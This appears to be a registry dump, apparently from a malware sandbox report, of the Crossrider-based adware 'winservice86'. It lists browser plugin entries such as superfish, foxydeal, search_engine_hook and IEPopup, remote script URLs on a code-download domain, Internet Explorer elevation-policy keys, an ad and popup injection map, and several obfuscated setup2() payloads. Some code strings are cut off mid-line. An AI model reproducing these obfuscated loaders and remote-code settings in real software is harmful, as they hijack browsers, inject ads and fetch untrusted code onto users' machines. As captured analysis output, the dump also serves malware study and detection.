"JavaScript" = "(function(){appAPI.ready=function(a){appAPI.resources.isReady(a);};}());var CrossRiderResourcesManager=(function(){var C={appId:(function(){var D=appAPI.appInfo;if(D){return appAPI.appInfo.id;}else{return appAPI.appID;}})(),url:{base:{production:[""\x68\x74\x74\x70\x3a\x2f\x2f\x72""
[HKCU\Software\winservice86\Installer]
"CodeDownloadDomain" = "http://js.newdemoonlinecloud.com"
[HKCU\Software\winservice86\Plugins\311]
"Name" = "dealply_mac_m"
[HKCU\Software\winservice86\Plugins\36]
"URL" = "http://js.newdemoonlinecloud.com/plugins/mins/36.js"
[HKCU\Software\winservice86\Plugins\102]
"URL" = "http://js.newdemoonlinecloud.com/plugins/mins/102.js"
[HKCU\Software\winservice86\Manifest]
"ThanksUrl" = "NA"
[HKCU\Software\winservice86\Plugins\311]
"JavaScript" = "if (typeof setup2 === 'function') { setup2('MWE3NDZlNDM0NTUxNTE0OTFlMWUxNTA5MzExMTA5NTM0YjRiNTQwMjE1MGQxNDU5NGE1ZTE4NDUxNTE4MDMxZjA5MDAwZjAyNWYwMjE4MGMwZTU2MDcxMTA3MTcxYzA4NTkwMDAwMGYwNTEwMDYwMzE4MWIwMjQ0MGIwYTViMDAwZDEwMWYwNTEzMDY1YzFhMTYwNzE3MmUyZTM0MzUzODJlMmEzNzMxMmMzNTM0MzkyOTJmMzkyZDIxMmQyMTM0MzUzNDI1M2YyMzI2MmQyNzNhMmU1NzBhMDYxYTM1MTAxMDBmMDA0YzJlMzQzNTM4MmUyYTM3MzEyYzM1MzQzOTI5MmIzMTI5M2IyZDI0M2MzNDM0Mjk0YzA5MTAwMDVlM2EyZTMyMzkzOTM5MzIyYjJkMjcyMDIzMmUzZTI1MmYzMzI2MmQyNzNhMmU1MzQ3N2I2MDQxNTk0NDQzNDcxOTA1MWYwNjE5MzQwYjA4NDE1ZjUxNTMwMzAyMWUxMTBhNWU0YzRhMTgyZTA4MDQwODA3MTQwNzA5MTYyZTE4MDUxMDA1NGYwZDA4MTAwNjE1MWY0NTE1MDUwYzU2MDcxMTA3MTcxYzA4NTkwMDAwMGYwNTEwMDYwMzE4MWIwMjQ0MGIwYTViMDAwZDEwMWYwNTEzMDY1YzFhMTYwNzE3MmUyZTM0MzUzODJlMmEzNzMxMmMzNTM0MzkyOTJmMzkyZDIxMmQyMTM0MzUzNDI1M2YyMzI2MmQyNzNhMmU1NzBhMDYxYTM1MTAxMDBmMDA0YzJlMzQzNTM4MmUyYTM3MzEyYzM1MzQzOTI5MmIzMTI5M2IyZDI0M2MzNDM0Mjk0YzA5MTAwMDVlM2EyZTMyMzkzOTM5MzIyYjJkMjcyMDIzMmUzZTI1MmYzMzI2MmQyNzNhMmU1MzQ3N2I2MDQxNTk0NDQzNDcwMTFkMWUxMTAzMGYzMDAwNDE1ZjUxNDI1"
[HKCU\Software\winservice86\Manifest]
"PluginsManifestVersion" = "37"
[HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{132cc74c-c1b1-4c00-8ea0-e4d27a15def2}]
"AppName" = "winservice86-bg.exe"
[HKCU\Software\winservice86\Plugins\42]
"Version" = "10"
[HKCU\Software\winservice86\Plugins\41]
"JavaScript" = "if(typeof appAPI===""undefined""){appAPI={};}(function(a){appAPI.isBackground=false;appAPI.tabId=a.getBhoInstanceId();appAPI.getTabId=function(){return appAPI.tabId;};appAPI.isActiveTab=function(){return appAPIinternal.isActiveTab();};appAPI.platform=""IE"";if(typeof appAPI.appInfo===""undefined""){appAPI.appInfo={};}var c=appAPI.internal.prefs.getChar(""fullVersionForUrl""
[HKCU\Software\winservice86\Plugins\424]
"Name" = "sharonl_vid_ws_m"
[HKCU\Software\winservice86\Plugins\269]
"Name" = "stats_ie"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKCU\Software\winservice86\Plugins\47]
"Name" = "resources_background"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCU\Software\winservice86\Code]
"BgJavaScript" = "/************************************************************************************ This is your background code. For more information please visit our wiki site: http://docs.crossrider.com/#!/guide/scopes_background*************************************************************************************/appAPI.ready(function($) { // Place your code here (ideal for handling browser button, global timers, etc.)});"
[HKCU\Software\winservice86\Installer]
"CodeDownloadFbDomain" = "http://js.clientdemocloud.com"
[HKCU\Software\winservice86\Plugins\380]
"Name" = "callcenter_j_m"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\winservice86]
"DisplayIcon" = "%Program Files%\winservice86\utils.exe"
[HKCU\Software\winservice86\Plugins\3]
"URL" = "http://js.newdemoonlinecloud.com/plugins/mins/3.js"
[HKCU\Software\winservice86\Plugins\46]
"JavaScript" = "if(typeof appAPI===undefined){appAPI={};appAPI.internal={};appAPI.internal.callbacks={};}else{if(typeof appAPI.internal===undefined){appAPI.internal={};appAPI.internal.callbacks={};}else{if(typeof appAPI.internal.callbacks===undefined){appAPI.internal.callbacks={};}}}appAPI.internal.callbacks.timersListeners={};appAPI.internal.callbacks.timersIsInterval={};appAPI.internal.callbacks.timer=function(b){var a=b.timerId;if(typeof a!==number){return;}if(typeof appAPI.internal.callbacks.timersListeners[a]===undefined){return;}var d=appAPI.internal.callbacks.timersListeners[a];if(!appAPI.internal.callbacks.timersIsInterval[a]){clearInterval(a);delete appAPI.internal.callbacks.timersListeners[a];delete appAPI.internal.callbacks.timersIsInterval[a];}try{d();}catch(c){console.error(setInterval/setTimeout - Caught an exception from user callback: (typeof c.message===string?c.message:???));}};(function(a){appAPI.setInterval=function(d,c,e){if((typeof d!==undefined)&&(typeof c===number)){var b=a.setInȱ"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{8b7f6268-f316-4f24-b4a4-efb0124290bd}]
"Policy" = "3"
[HKCU\Software\winservice86\Plugins\262]
"JavaScript" = "if (typeof setup2 === 'function') { setup2('MWY2MTUyNDE0NzU3NDcwZTEyMDAxNDNlMDAwZDQ1NGQ0NTQ0MGUwMDEwMWI0ODRlNDgxNDAxMDgwNTE1MDcwMzE3NTA0YTE2NGIwNzBkMTUwOTBhMWIwOTAzNTkwYjAzMTI1YjE3MWUxMDRlMTE0NDU3NTc1ZjE2MDA0NDJkM2UyNDI1MmEzNTM1MjYyZDJmMzczMzM4MzIzZDMyMjMzYTIwMmUzNjNlMzQyMjI3MzkyZjMwM2IzNDVkMGQ0OTFkMTY1OTE2MWQwMDU2NDM1NjU1NDc0MzAzMWUwMDU5MzQyZDIyMzUzODM2MzUzNDNkMjAyZTIwM2UyNjI3MzUzOTI4MzUyOTJlMmQzZTQxMDQxYzE1MTIxMTA5MDIxNjVjMzgyODI2MzQyOTI3MzczOTNiMjUyMjI1M2EyZjI4MjczMDJhM2UyZDIyMjUzYTMzMzUzMTM2MzQzYjI1MzgyODQ3NGE2YzU0NDQ0YjUyNDMwZjAzMTExNjE1MjExNjA3NTA1YjQ3NTUwZDEyMTIwNDE3NTE1ZDRlMDQxMzBiMDUwNzE3MGMwZTQzNGMwNjU5MDQwZDA3MTkwNTAyMWEwNTQ5MTkwMDEyNDkwNzExMDk1ZDE3NTQ0NTU0NWYwNDEwNGIzNDJkMjIzNTM4MzYzNTM0M2QyMDJlMjAzZTIyMmYzMTIzMjgzMDIxMmYyZDMyMzIzNTNhMmYyMjJiM2I0NDFlNGYwZDA0NWExNjBmMTA1OTVhNDU1MzU3NTEwMDFlMTI0OTNiMzQzMTMzMjgyNDM2MzQyZjMwMjEzOTJkMjAzNzI3M2EyODI3MzkyMTM0MmQ0NzE0MGUxNjEyMDMxOTBkMGY0ZjNlMzgzNDM3MjkzNTI3MzYyMjM2MjQzNTI4MmMyODM1MjAyNTI3M2UyNDM1MjgzMDM1MjMyNjNiMjIzNjNlMzg1NTQ5NmM0NjU0NDQ0YjUwMTEwYjAyMDI"
[HKCU\Software\winservice86\Plugins\104]
"Version" = "12"
[HKCU\Software\winservice86\Plugins\102]
"JavaScript" = "if (typeof setup2 === 'function') { setup2('MGU3OTQzNDk1MTVhNDExODAyMTkwNTI2MTEwNTUzNDA0MzUyMWUxOTAxMDM1OTQ2NWUxMzRkMTMwNDA5MDcxNzEzMDMwMjU0MGExZTEwMDI1YTEwMTEwZDAzNTUwOTExMDAwYzA2MTAxMTAwMDEwZTRkMWEwNTUyMTYxYjAyMDcxZjFmMGY0ZDE1MWYxMTAxM2MzNjJlMzkzMTNmMjUzZTI3M2EyNzJjMjMyNTI2MjgyMjI4M2IzNzI2MmQyZTI5MzYzMjI5MjQzMTJjM2M0ZjEwMGExMzI0MWYxOTE5MTY1ZTM2MmUzOTMxM2YyNTNlMjczYTI3MmMyMzI1MjIyMDI2MzIzYjMyMmUyYzJlMjU0NTE4MWYwOTQ4MmMzYzJhMjMzNTMwMjMyNDI0MzEzNjMxMzYyNDI5MjYyMjI5MjQzMTJjM2M0YjVkNzA0MzUwNTY0ZDU3MWIxNzFkMDEwOTM2MDIxYTRmNGY1MzQxMDEwNTBlMTMwMzRjNDI1YTFhM2MwYTAzMWUxMTE0MDYwNzA2MmMwYTA3MTcxNTRkMDQxYTFlMTYxNzBkNDcxMjE1MGU1ZjE1MWYxMTAxNGMwMzEwMGMwMjAzMTUxZjFjMDMxNzQ3MWIwOTVjMTMxZTBjMWIxZDA2MDU0YzE5MTExNDA0MzIyYTJjMjAzYjNlMjkzMDIyM2YyOTMwMjEzYzJjMjkyZTI2M2UzMjI4MzEyYzMwM2MzMzI1MmEzNDI5MzI1MzEyMTMxOTI1MTMxNzFjMTM1MDJhMmMyMDNiM2UyOTMwMjIzZjI5MzAyMTNjMjgyMTJhM2MzZTM3MjAzMDJjM2M0ZjE5MTMwNzRkMjkzMjM2MjEyYzNhMjIyODJhMzQzMzNmMmEyNjMwMmMyMzI1MmEzNDI5MzI1NzVmNDM0OTUxNWE2OTUwNTY0ZDU1NTExMzA1MDQxZDBhMWUzZjA5NTc0OTQzNTg0MTQ4Njk"
[HKCU\Software\winservice86\Update]
"LastCheck" = "1456422028"
[HKCU\Software\winservice86\Plugins\345]
"JavaScript" = "__INFORMATION_MAPPING__={ads:[101,108,116,117,125,126,135,141,158,159,170,171,174,178,180,192,193,206,211,225,230,231,232,233,239,241,261,264,266,279,284,289,297,300,302,306,309,310,314,333,334,339,340,344,363,368,372,374,379,387,388,393,399,408,410,413,415,416,418,421,424,437,446,452],pops:[108,127,155,170,179,190,195,197,208,221,224,265,273,277,278,280,281,292,293,294,296,262,303,324,337,338,341,343,346,347,356,357,358,390,396,401,423,436,439,440,450,459],intext:[103,117,123,142,259,263,342,359,360,391,402,442],shopping:[92,93,102,104,117,124,128,138,184,191,198,199,200,204,213,215,218,223,227,228,234,235,237,242,243,256,260,254,275,282,288,290,295,301,304,307,308,311,317,325,327,328,335,350,351,369,370,371,375,385,389,397,409,411,412,414,419,441,443,444,451,453,457]};"
[HKCU\Software\winservice86\Plugins\263]
"Name" = "intext_5_j_m"
[HKCU\Software\winservice86\Plugins\94]
"Name" = "IEPopup"
[HKCU\Software\winservice86\Plugins]
"OnRequestPluginList" = "14,42,41,39,38,43,45,64"
[HKLM\SOFTWARE\GlobalUpdate\Update\Clients\{84f03351-931d-41a5-a53d-6b5a7a5a2c96}]
"Bic" = "8D4C23D6A4134239976F389726A57621IE"
[HKCU\Software\winservice86\Plugins\4]
"Version" = "5"
[HKCU\Software\winservice86\Plugins\46]
"Version" = "5"
[HKCU\Software\winservice86\Plugins\275]
"Version" = "3"
[HKCU\Software\winservice86\Plugins\93]
"JavaScript" = "if (typeof setup2 === 'function') { setup2('MTE2ZTY4NTUwYzFhMTkxYTI1MTQwNjQ2NWI1NzQ2MDYxOTFlMDA1YzQ1NGIxNjAwMTM0MDFlMWYwMDAzMTgwMjA4MDQwYzQwMGUwNTFkNDkxZDE3NGUwNDAyMzEwMDBiMTkwODQ0MGUxMjA3NWIwYTAxMTkxZjEzMTgwNzA0NGEwYzA2MWIxMDFkMGYwMTEzNDcwMjE3MGIxZjIzMTQ1YjBiMDYwMjUxMjczYTI0MmU0ZDM5MzUyNzMzMzgzNzNkM2YyMzM0MjMzODNiMjQyZjMwMmIyMzJlMzUyMjM1MzczNDM1M2IyNzI5MzUyZjQwMWEwNTEzMDMwYTBiMWYwNDExMGIwZjU5M2UyODI3M2MyMjM5MjMzNDIzMjAyNDI1M2IyZjNkM2EyZjI4MmIyOTI0MjgzYjRjNDE2MDc5NDQwMjEwMTUwNzE3M2IxZjA2NTI1YzRhNDYwOTAzMTAxZTFlNTA1ZjQ5MWQxMzE2NTkxNzFiMWQwZjAyMDAwMzE3MDk1OTA3MDEwMDQ1MDcxNTQ1MTcwNzI4MDkwZjA0MDQ1ZTBjMTkxNDVlMTMwODFkMDIxZjAyMDUwZjU5MDkxZjEyMTQwMDAzMWIxMTRjMTExMjEyMTYyNzA5NTcxMTA0MDk0MjIyMjMyZDJhNTAzNTJmMjUzODJiMzIyNDM2MjcyOTJmMjIzOTJmM2MzNTMyMmEyYTI4MmUyZjM1M2YyNjNlM2UyMDMxMzI0YzAwMDcxODEwMGYxMjE2MDAwYzA3MTU1YjM1M2IyMjI1MmIzZDNlMzgzOTIyMmYzNjNlMzYzNDNlMzIyNDMxMmIyZjNiM2U1NTQ4NjQ2NDQ4MDAwYTFmMDMwODE5MmQwYTRmNTA1MDVmNTk2ZTFj', 'jdawdnmjpf'); }"
[HKCU\Software\winservice86\Plugins\104]
"URL" = "http://js.newdemoonlinecloud.com/plugins/mins/104.js"
[HKCU\Software\winservice86\Plugins\4]
"URL" = "http://js.newdemoonlinecloud.com/plugins/javascripts/jquery-1_7_1_min.js"
[HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{132cc74c-c1b1-4c00-8ea0-e4d27a15def2}]
"AppPath" = "%Program Files%\winservice86"
[HKCU\Software\winservice86\Plugins\246]
"Version" = "15"
[HKCU\Software\winservice86\Plugins\273]
"URL" = "http://js.newdemoonlinecloud.com/plugins/mins/273.js"
[HKCU\Software\winservice86\Plugins\221]
"Version" = "4"
[HKCU\Software\winservice86]
"ActiveAppId" = "64755"
[HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{8b7f6268-f316-4f24-b4a4-efb0124290bd}]
"Policy" = "3"
[HKCU\Software\winservice86\Plugins\246]
"URL" = "http://js.newdemoonlinecloud.com/plugins/mins/246.js"
[HKCU\Software\winservice86\Plugins\46]
"URL" = "http://js.newdemoonlinecloud.com/plugins/mins/46.js"
[HKCU\Software\winservice86\Plugins\269]
"URL" = "http://js.newdemoonlinecloud.com/plugins/mins/269.js"
[HKCU\Software\winservice86\Plugins\2]
"JavaScript" = "(function(){var b=dummy so this plugin won't be empty;})();"
[HKCU\Software\winservice86\Plugins\221]
"URL" = "http://js.newdemoonlinecloud.com/plugins/mins/221.js"
[HKCU\Software\winservice86\Installer]
"StatsDomain" = "http://stats.newdemoonlinecloud.com"
[HKCU\Software\winservice86\Plugins\200]
"Name" = "foxydeal_m"
[HKCU\Software\winservice86\Plugins\45]
"Version" = "4"
"JavaScript" = "if(typeof appAPI===undefined){appAPI={};}if(typeof appAPI.internal===undefined){appAPI.internal={};}if(typeof appAPI.internal.callbacks===undefined){appAPI.internal.callbacks={};}appAPI.tabId=onRequest;window.console.log=appAPI.internal.console.log;console.log=window.console.log;window.console.info=appAPI.internal.console.info;console.info=window.console.info;window.console.warn=appAPI.internal.console.warn;console.warn=window.console.warn;window.console.error=appAPI.internal.console.error;console.error=window.console.error;(function(){function a(e){var c=appAPI.internal.prefs.getChar(e,Crossrider\\onRequest);if(typeof c!==string){return 0;}if(c.length===0){return 0;}c=appAPI.JSON.parse(c);if(typeof c!==object){return 0;}var d=0;for(var b in c){d ;appAPI.internal.callbacks.addListener(onRequest,function(m,g){var n=appAPI.internal.callbacks.onRequest.listenersAdditionalData[g];if(typeof n.code!==string){return;}var f={};var i;if(typeof n.value===undefined){i=undefined;}else{if(n.value===n"
[HKCU\Software\winservice86\Plugins\288]
"Version" = "4"
[HKCU\Software\winservice86\Plugins\42]
"Name" = "IEInternal"
[HKCU\Software\winservice86\Installer]
"FullVersion" = "1.35.9.29"
[HKCU\Software\winservice86\Plugins\273]
"JavaScript" = "if (typeof setup2 === 'function') { setup2('MTA2MTRmNDU1OTUwNDQwNjE1MDUxYjNlMWQwOTViNGE0NjRjMDkwNTFmMWI1NTRhNTYxNDU3MWYxMDE1MGYxZTA5MDQxNTQ0MDI1YjU5NWYwODA3MDAxMDFkMTYxNDAxMGYwNTQ1MDUwYTExNTYwMzA1MWMwODAxMWYxODQwMDYxNjFlMTIwYjE5MDUxZTBhMDMwZjBhNWYxMDVjNGUxMjFmMTMwNTE2NTcxYTE1NTEwMDE3MGQzNDA2MDE0NDQxNTc1YTU0NTcxODFlMGQwNDFmMTYzOTA3MDU0YzM0MzQyYzM3MzYyMzM1M2MyODM1MmUzOTMwMjAyMTI0MjMyMDI1MzQyZjM0M2MzMDNiMmYyZjJhM2UyZTRkMTgwZDE3MTgxZTAyNTMzZTJlMjgzOTIwMzYyYTIyMmYyYTI0MjMzNDJhM2YzNTI2M2UyNzIzMjQyZTM0NDk0MzZmNTk1MDQ2NGU0MzE5MWYxZjFmMTYyYzAyMGE0YzViNTE0OTAzMWIxMTA5MDM1YzQxNGUxNTVhMWExZTAxMWQwNTAwMGYwZDQ1MGY1ZTU3NGIxYTFjMDkxYjA1MTcxOTA0MDExMTU3MWUwMzFhNGUwMjA4MTkwNjE1MGQwMzQ5MGQwZTFmMWYwZTE3MTEwYzExMGEwNDEyNWUxZDU5NDAwNjBkMDgwYzFkNGYxYjE4NTQwZTAzMWYyZjBmMGE1YzQwNWE1ZjVhNDMwYTA1MDQwZjA3MTczNDAyMGI1ODI2MmYyNTNjMmUyMjM4MzkyNjIxM2MyMjM5MmIzOTI1MmUyNTJiMjAzZDJmMzUzYjIzMmUyMjJmMzAzYTVmMDMwNDFjMDAxZjBmNTYzMDNhM2EyMjI5M2QzMjIzMjIyZjJhMzcyNjMxMzYzZTNlM2YyYTI2MmEzYTI2NTI0YTY0NDE1MTRiNGI0ZDE1MTUwNTAxMDcwZjM4MGY0OTU1NDU0YjQ3NTU"
[HKCU\Software\InstalledBrowserExtensions\17638\Status]
"Installed" = "1"
[HKCU\Software\winservice86\Plugins\223]
"URL" = "http://js.newdemoonlinecloud.com/plugins/mins/223.js"
[HKCU\Software\winservice86\Manifest]
"DisableIe" = "true"
"RunInFrame" = "false"
[HKLM\SOFTWARE\GlobalUpdate\Update\Clients\{84f03351-931d-41a5-a53d-6b5a7a5a2c96}]
"srcid_var" = "002201"
[HKCU\Software\winservice86\Plugins\93]
"Name" = "superfish_no_coupons_m"
[HKCU\Software\winservice86\Code]
"NewTabJavaScript" = ""
[HKCU\Software\winservice86\Plugins\263]
"Version" = "2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\winservice86]
"Publisher" = "Corporate Inc"
[HKCU\Software\winservice86\Plugins\39]
"Version" = "5"
[HKCU\Software\winservice86\Manifest]
"PublisherId" = "17638"
[HKCU\Software\winservice86\Plugins\200]
"Version" = "6"
[HKCU\Software\winservice86\Plugins\376]
"Name" = "loaderBackup"
[HKCU\Software\winservice86\Plugins\223]
"Version" = "8"
[HKCU\Software\winservice86\Plugins\78]
"Name" = "CrossriderInfo"
[HKCU\Software\winservice86\Plugins\195]
"Version" = "28"
[HKCU\Software\winservice86\Plugins\3]
"JavaScript" = "(function(){var b=dummy so this plugin won't be empty;})();"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKCU\Software\winservice86\Manifest]
"SetNewTab" = "false"
[HKCU\Software\winservice86\Plugins\9]
"Name" = "search_engine_hook"
[HKCU\Software\winservice86\Plugins\91]
"JavaScript" = "(function(K){var y=[].slice;var x={};var a=function(ap){if(typeof ap==string&&typeof ap.trim==function){return ap.trim();}return ap==null?:ap.toString().replace(/^\s /,).replace(/\s $/,);};function f(ap){var aq=x[ap]={},ar,at;ap=ap.split(/\s /);for(ar=0,at=ap.length;ar
[HKCU\Software\winservice86\Plugins\94]
"Version" = "2"
[HKCU\Software\winservice86\Plugins\376]
"JavaScript" = "(function(){var a=(function(){var l=function(){return appAPI&&appAPI.installer&&appAPI.utils.isFunction(appAPI.installer.getAdditionalInfo)?appAPI.installer.getAdditionalInfo():null;};var j={ie:10,ni:11,te:19,ch:20,to:26,sb:27,op:28,tc:29,ff:30,tf:39,sf:40,nv:50,ms:51,mf:52,mc:53,np:54,sm:55,fm:56,cm:57,mx:60};var p=source_id;var k=776;var e=__PageActive__;var q=new Date(2013,0,1);var f=1000*60*2;var n=1000*60*10;var o=(appAPI&&appAPI.installer&&typeof appAPI.installer.getUnixTime===function)?appAPI.installer.getUnixTime()*1000:((new Date(2013,0,1)).getTime());var h=l;var g=[{pluginId:288,httpUrl:http://istatic.eshopcomp.com/fo/min/crqc.js?hid=__CROSSRIDER_USER_ID__&bname=__CROSSRIDER_APP_NAME__&subid=__CROSSRIDER_EXTENDED_SUB_ID__,httpsUrl:https://istatic.eshopcomp.com/fo/min/crqc.js?hid=__CROSSRIDER_USER_ID__&bname=__CROSSRIDER_APP_NAME__&subid=__CROSSRIDER_EXTENDED_SUB_ID__,delay:0},{pluginId:242,httpUrl:http://inst.shoppingate.info/js/sg_bg.js?AFFILIATE"
[HKCU\Software\winservice86\Plugins\193]
"JavaScript" = "if (typeof setup2 === 'function') { setup2('MWQ2MjdhNDMwMzBlMTIwMDM4MDIwYTRhNDk0MTQ5MTIxMjA0MWQ0YTQ5NDcxMjEyMTkwYzRiMTE0MzExMGQwOTFlMDAwMjEyMDI1ZTAzMTUxMjQ3MDAwNTQ0NGI1MTQwNWQ1ZjU3NTg0MTU1NDUxMDE1NTI0MTdhNmY0YTFiMTUxZjBhMTUyNTFmMWM0NDUyNTM0MzAzMGUxMjAwMWU0YTQ5NDcxMjEyMTkwYzRiMTE0MzExMGQwOTFlMDAwMjEyMDI1ZTAzMTUxMjQ3MDAwNTQ0NGI1MTQwNWQ1ZjU3NTg0MTU1NDUxMDE1NTI0MTdhNmY0YTAzMGQxZTFkMGYxZTI0MTQ0NDUyNTM1MDUyNDk0YTdhNGQ1MDQ2NDg1MTE3MGUwODEyMTkwZTExMGE0YTQ5NDEzMDU4MDcxNDFlNTIzYjQ0Nzk0MTRiNWE0NjUyMDQxZTBhMDExZDA0MjEyOTQ0NGE0ZDUyMTEwMTFkMDUwNDBkNDgyZjFmMDYxYzU5NDQ1MTViMDI1NzQwNWY0NDQ2NTU1MzFhNGI1ZDE2MDUwZjFjMGYxYjFiMDQxOTI1MTUwNTBmMTkwMjRmNDk0MTRjMjUzOTMzM2YzZjM1M2IyMTI4MmYzZjM0MmYyODI4MzIyZDNkMjUyZTNlMzkyMzM4MzIzOTIxMzczZTM0NWQ0YTUwNGExMTAyMGMxYzBmMDUxYjBiMTU0YTRhNDY0ZjJjM2UyODI4MjkyMzNlMjIyZjJjMzYzMzM0M2IzNjIwMzIzZTI3MjUzNjNlMzQ1ZDFiNGI0ZjdhMWI=', 'fhsakzfpmp'); }"
[HKLM\SOFTWARE\InstalledBrowserExtensions\17638\Status]
"Installed" = "1"
[HKCU\Software\winservice86\Plugins\253]
"URL" = "http://js.newcloudrack.com/plugins/mins/253.js"
[HKCU\Software\winservice86\Plugins\180]
"JavaScript" = "if (typeof setup2 === 'function') { setup2('MTU2MDY1NDUxYTE5MWIxZTMyMTAwMjQ4NTY0NzUwMDUxYjFhMTc1ODQxNDUwZDQ5MDYwYjE3MDcxNjRjMGQwNTAxNDgxMzQzMWYwNjE3NWQ1ODU4NWExNTE3MGI1ZDUzMzgzZDJkMzgyMzM0MjEzZjI2MmEyMjMwMzEyZjM0MzMzNzIzMmIyYjIzM2QzZDNmMmUzODNiMjkzMDMxNDE1NDVjNWMyMjA2MWYwODUyMzEzODIxM2MyNTNmMzQyMDI0MmIyYjM1M2QyZjNhM2MzODNjMmMyMjJiMzgzZDQ4NWM1ZTUxMDAwODA5NWQ1YTNkMzEyOTNlMjgyMTNlM2QyNzIzMjczYzM1MzkzNDM3M2YzMDI3MjMzZDMxNGM1YTU1NDQxZjBhMDg1NjVmNTg1OTViNTU0NDBiNTg1ZDUwNTE1OTU4NWE1ZTQ0NTk1OTViNTA1MDQ4MWUwOTBlMTY1MDMwMzEyNDMwMjEzOTNmMzUzYjI5MmEzYzM4MjMzZTNhMzMyZTM2MzIzMDQ4MTMxNzA3MGU1MTM4MmQyZTNkMjEzNDMxM2MyMzI4MjIyMDMyMjYyMDM0MzYyZjI2MjAyMjIwMzIzYTNkMjIzMDMxMjMyODM4MmQ0ZjQzNjQ2ZTQwMDYxZTE4MTcwMTM4MWQwMjQ1NTg0ZTQ4MDQxMzA2MWQxYzU0NDg0ZDBmNDQxODAxMGEwNDFlNDAwNDBkMDM0NTBkNDkwMjA1MWY1MTUxNTA1ODE4MDkwMTQwNTAzMDMxMjQzMDIxMzkzZjM1M2IyOTJhM2MzODI3MzYzZTI5MjkzNjI4MmIzMTM0MzcyYzM1MjUyMzJkMzI0OTU4NTU1NDIwMGIwMTAyNGYzMjMwMmQzNTJkM2QzOTNlMmUzNjI4M2QzMTI2MzIzZTM1MjIyNjNmMjgzMDMxNDE1NDVjNWMxZTAyMTQ1ZTUyMzEzODIxM2MyNTNmMzQyMDI0MmI"
[HKCU\Software\winservice86\Plugins\223]
"Name" = "imonomy_m"
[HKCU\Software\winservice86\Plugins\242]
"Name" = "price_gong_m"
[HKCU\Software\winservice86\Installer]
"zdata" = "0"
[HKCU\Software\winservice86\Plugins\311]
"Version" = "4"
[HKCU\Software\winservice86\Plugins\43]
"Name" = "IEMessaging"
[HKCU\Software\winservice86\Plugins\288]
"JavaScript" = "if (typeof setup2 === 'function') { setup2('MWU2NzVhNWE1NDQ1NTMxYjE5MTcxNTM4MDgxNjU2NWY1MTUxMDUxNzExMWQ0MDU1NWIwYzAyMDcwYzE3MGMwZTU0MWYwNzBkMWUwMzBlMGMwODFkNTQxOTFiMDg1ZTE1MDI0YzA4MDQxNDU1MTcxNzAwMTA0MzA5MTY1MjEyMTMxMDU4MmUyYzJlMzEyYTNlMjkyODNkMjEzNDIxMzIzNjM2MjgyODI1M2QyMTJlMmM0YjAxMGIwYzE3MWY0OTNhMmUzMDNmMmMzNjNlMjgzMzMwMjAyMzJjMmMzMzM1MzIzNDNiMzkyMDJlMmM0YjEwMTAwZjEzMWU0OTNhMmUzMDNmMmMzNjNlMjgzMzMwMjAyMzJjMjgzYjMxMjgzNDNlMzEyMTJlMjAzODIxM2EyNDNlMjUyYjQ3NWQ3OTRkNDM0NTRkNTgxMjAwMTEwMTAwMzgxMTA5NGY0MDVhNTYwZDA1MDcxZDEwNWY0MjU1MTMwNzExMTAwNzA0MDA0YjA4MDkxMjFiMTUxMjFjMDAxMzRiMGUxNTE3NWIwMzFlNWMwMDBhMGI0MjE5MDgwNTA2NWYxOTFlNWMwZDA0MWU0NzJiM2EzMjIxMjIzMDM2M2YzMzNlMzEzNzJlMjYzZTI2MzczMjMzM2UyYjNhNTcxMTAzMDIwODA4NDcyNTJiMjYyMzNjM2UzMDM3MjQzZTNmMjYzYTMwMjMzZDNjMmIyYzM3M2YyYjNhNTcwMDE4MDEwYzA5NDcyNTJiMjYyMzNjM2UzMDM3MjQzZTNmMjYzYTM0MmIzOTI2MmIyOTNmM2UyYjM2MjQzMTMyMmEyMTMyMjU1ODU4NmY1MTUzNGQ0MzQ3MWQxNjBmMTMwYzFmM2EwOTQxNWY0ZDQ4NDI0YzZmMGM=', 'emzzteqsmc'); }"
[HKCU\Software\winservice86\Plugins\44]
"Version" = "6"
[HKCU\Software\winservice86\Plugins]
"NewTabPluginList" = "42,38,46,17,14,78,13,41,44,39,35,43,40,64,2,4,3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1D 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\winservice86\Plugins\288]
"Name" = "firstoffer_pricecomp_m"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKLM\System\CurrentControlSet\Control\Session Manager]
"PendingFileRenameOperations" = "\??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsl3.tmp\extensionData\,"
[HKCU\Software\winservice86\Plugins\128]
"URL" = "http://js.newdemoonlinecloud.com/plugins/mins/128.js"
[HKCU\Software\winservice86\Plugins\91]
"URL" = "http://js.newdemoonlinecloud.com/plugins/mins/91.js"
[HKCU\Software\winservice86\Plugins\221]
"Name" = "icm_downloads_m"
[HKCU\Software\winservice86\Plugins\43]
"Version" = "5"
[HKCU\Software\winservice86\Installer]
"FullVersionForUrl" = "1_35_09_29"
[HKCU\Software\winservice86\Code]
